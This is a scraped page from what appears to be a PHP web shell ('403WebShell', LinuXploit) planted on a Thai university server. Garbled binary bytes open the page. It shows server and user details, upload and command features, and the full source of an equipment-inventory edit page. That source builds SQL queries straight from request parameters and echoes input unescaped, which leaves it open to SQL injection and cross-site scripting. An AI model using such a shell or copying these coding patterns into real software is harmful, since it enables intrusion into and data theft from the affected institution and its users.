h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/5801/root/var/www/html/hardware/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/5801/root/var/www/html/hardware/pages/hardware_edit-2023-11-23.php
<?php
/* ob_start();
 header( "location: http://arit.skru.ac.th/arit/IntroForm_Search.php" );
 exit(0);*/
?>
<?
//session_start();
?>
<?php include 'check_mode_admin.php';?>
<?php include 'dbconnect.php';?>
<?php include 'header_staff.php';?>

<?php
	$pagetitle_text = "แก้ไขข้อมูลครุภัณฑ์";

	$assetcode = null;
	if(isset($_POST["assetcode"]))
	{
		$assetcode = $_POST["assetcode"];
	}
	if(isset($_GET["assetcode"]))
	{
		$assetcode = $_GET["assetcode"];
	}	
	
	$status_code1 = null;
	if(isset($_POST["status_code1"]))
	{
		$status_code1 = $_POST["status_code1"];
	}
	if(isset($_GET["status_code1"]))
	{
		$status_code1 = $_GET["status_code1"];
	}	
	
	$loc = null;
	if(isset($_POST["loc"]))
	{
		$loc = $_POST["loc"];
	}
	if(isset($_GET["loc"]))
	{
		$loc = $_GET["loc"];
	}		
	
	$sid = null;
	if(isset($_POST["sid"]))
	{
		$sid = $_POST["sid"];
	}
	if(isset($_GET["sid"]))
	{
		$sid = $_GET["sid"];
	}	
	
	$Page = null;
	if(isset($_POST["Page"]))
	{
		$Page = $_POST["Page"];
	}
	if(isset($_GET["Page"]))
	{
		$Page = $_GET["Page"];
	}	
	
	$txtKeyword = null;
	if(isset($_POST["txtKeyword"]))
	{
		$txtKeyword = $_POST["txtKeyword"];
	}
	if(isset($_GET["txtKeyword"]))
	{
		$txtKeyword = $_GET["txtKeyword"];
	}		
			
?>	
                        <h1 class="page-header"><font color="#0000FF"><?php echo $pagetitle_text;?></font></h1>		


<?php	
	$sql = "SELECT * FROM hardware_mis WHERE assetcode='" . $assetcode . "'";
	$query = mysqli_query($conn,$sql);

if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
?>
								<h3><font color="#009966">รหัสครุภัณฑ์ : <?php echo $result["assetcode"];?></font></h3>
								<h3><font color="#009966">รหัสเดิม : <?php echo $result["remark"];?></font></h3>
								<h3><font color="#009966"><?php echo $result["assetnamex"];?></font></h3>
							<form action="hardware_edit_db.php" method="post" name="form1" id="form1">								
                            <table class="table table-striped table-bordered table-hover">
                                    <thead>
                                        <tr>
										<th><div align="center">สถานะครุภัณฑ์</div></th>
										<th><div align="center">สถานที่ตั้ง/จัดเก็บ</div></th>	
										<th><div align="center">คุณสมบัติ (ยี่ห้อ/รุ่น)</div></th>										
                                        </tr>
                                    </thead>
                                <tbody>

                                    <tr>
										<td bgcolor="#FFFF99">
											<div class="form-group">
	<?php
		$sql3 = "SELECT * FROM hardware_mis_status ORDER BY status_code ASC";
		$query3 = mysqli_query($conn,$sql3);	
		while($result3=mysqli_fetch_array($query3,MYSQLI_ASSOC)) {
	?>											
												<div class="radio">
													<label>
<?php
			if($result["status_code"]==$result3["status_code"]) {
?>
														<input type="radio" name="status_code" id="<?php echo $result3["status_code"];?>" value="<?php echo $result3["status_code"];?>" checked="checked"><?php echo $result3["status_name"];?>
<?php			
			} else {
?>
														<input type="radio" name="status_code" id="<?php echo $result3["status_code"];?>" value="<?php echo $result3["status_code"];?>"><?php echo $result3["status_name"];?>
<?php			
			}
?>	

													</label>
												</div>
	<?php
		} //while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
	?>
											</div>										
										</td>
										<td bgcolor="#FFFF99">
											<div class="form-group">
												<!--<input name="text205" id="text205" class="form-control" value="<?php //echo $result["text205"];?>">-->
												<select class="form-control" name="text205" id="text205">
<?php
	$sql2 = "SELECT * FROM hardware_mis_location ORDER BY location_name ASC";
	$query2 = mysqli_query($conn,$sql2);	
	while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
	{
		if($result2["location_name"] == $result["text205"]) {
?>							
								<option value="<?php echo $result2["location_name"];?>" selected="selected"><?php echo $result2["location_name"];?></option>
<?php		
		} else { //if($result2["location_name"] == $result["text205"]) {
?>							
								<option value="<?php echo $result2["location_name"];?>"><?php echo $result2["location_name"];?></option>
<?php		
		} //if($result2["location_name"] == $result["text205"]) {
	} //while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
?>
								</select>												
											</div>
										</td>
										<td bgcolor="#FFFF99">
											<div class="form-group">
												<input name="spec" id="spec" class="form-control" value="<?php echo $result["spec"];?>">
											</div>										
										</td>	
									</tr>
                                </tbody>
                            </table>
                            <div class="form-group">
											<input type="hidden" name="assetcode" id="assetcode" value="<?php echo $assetcode;?>" />	
											<input type="hidden" name="status_code1" id="status_code1" value="<?php echo $status_code1;?>" />	
											<input type="hidden" name="loc" id="loc" value="<?php echo $loc;?>" />												
											<input type="hidden" name="sid" id="sid" value="<?php echo $sid;?>" />	
											<input type="hidden" name="Page" id="Page" value="<?php echo $Page;?>" />	
											<input type="hidden" name="txtKeyword" id="txtKeyword" value="<?php echo $txtKeyword;?>" />							
											<input name="submit" type="submit" id="submit" value="บันทึกข้อมูล" class="btn btn-success">
											&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href='javascript:history.back(1);'><button type="button" class="btn btn-default">ยกเลิก</button></a>										
                            </div>								
							
							</form>
							<hr />
							<h3>รายละเอียดอื่นๆ</h3>							

                            <table class="table table-striped table-bordered table-hover">
                                <thead>
                                	<tr>
										<th><div align="center">หน่วยนับ</div></th>
										<th><div align="center">มูลค่าครุภัณฑ์</div></th>
										<th><div align="center">วันที่ได้มา</div></th>
										<th><div align="center">แหล่งเงิน</div></th>
										<th><div align="center">คุณสมบัติ (ยี่ห้อ/รุ่น)</div></th>
                                        <th><div align="center">หมายเหตุ/เลขครุภัณฑ์เดิม</div></th>
										<th><div align="center">รูปภาพ</div></th>										
                                    </tr>
                                </thead>
                                <tbody>

                                    <tr>							
										<td><?php echo $result["unitidx"];?></td>
										<td><?php echo number_format($result["dr"],2);?></td>
<?php										
											$date1=date_create($result["receive_date"]);
											$strYear = date_format($date1,"Y")+543;
											$strMonth= date_format($date1,"n");
											$strDay= date_format($date1,"j");
?>
										<td><?php echo $strDay . "/" . $strMonth . "/" . $strYear;?></td>
										<td><?php echo $result["budgetgroupidx"];?></td>
										<td><?php echo $result["spec"];?></td>																				
										<td><?php echo $result["remark"];?></td>		
										<td>
<?php
	//$sql3 = "SELECT id,file_name FROM hardware_have_picture WHERE noid='" . $result["remark"] . "'";
	$sql3 = "SELECT file_name FROM hardware_mis_picture WHERE assetcode='" . $result["assetcode"] . "' ORDER BY id0 ASC";
	$query3 = mysqli_query($conn,$sql3);
	while($result3=mysqli_fetch_array($query3,MYSQLI_ASSOC)) {
?>										
												<p><a href="<?php echo "hardware_mis_picture/" . $result["assetcode"] . "/" . $result3["file_name"];?>" target="_blank"><img src="<?php echo "hardware_mis_picture/" . $result["assetcode"] . "/" . $result3["file_name"];?>" width ="200"/></a></p>	
<?php
	} //while($result3=mysqli_fetch_array($query2,MYSQLI_ASSOC))
?>
										</td>																		
                                    </tr>
<?php
} else { //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) 
?>
<h1><font color="#FF0000">ไม่พบรหัสครุภัณฑ์ <?php echo $assetcode;?></font></h1>
<?php
} //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) 
?>	
                                </tbody>
                            </table>
                            <!-- /.table-responsive -->
							
<?php 

?>	
						<form action="photo_add_db.php?job_id=<?php echo $job_id;?>" role="form" method="post" enctype="multipart/form-data" name="form_photo" id="form_photo">
							<hr />
							<h3>อัพโหลดรูปภาพ</h3>
							<table class="table table-striped table-bordered table-hover">
							 	<tbody>
									<tr>
										<td>
											
												<div class="form-group">
													<input type="file" name="file_name" id="file_name" class="form-control">
												</div>
										</td>
										<td>
												<div class="form-group">														
													<input type="hidden" name="assetcode" id="assetcode" value="<?php echo $assetcode;?>" />	
													<input type="hidden" name="status_code1" id="status_code1" value="<?php echo $status_code1;?>" />	
													<input type="hidden" name="loc" id="loc" value="<?php echo $loc;?>" />																											
													<input type="hidden" name="sid" id="sid" value="<?php echo $sid;?>" />	
													<input type="hidden" name="Page" id="Page" value="<?php echo $Page;?>" />	
													<input type="hidden" name="txtKeyword" id="txtKeyword" value="<?php echo $txtKeyword;?>" />	
													<input name="submit" type="submit" id="submit" value="อัพโหลด" class="btn btn-success">
												</div>													
										</td>
									</tr>		
								</tbody>					
							</table>
					</form>		
<?php

?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit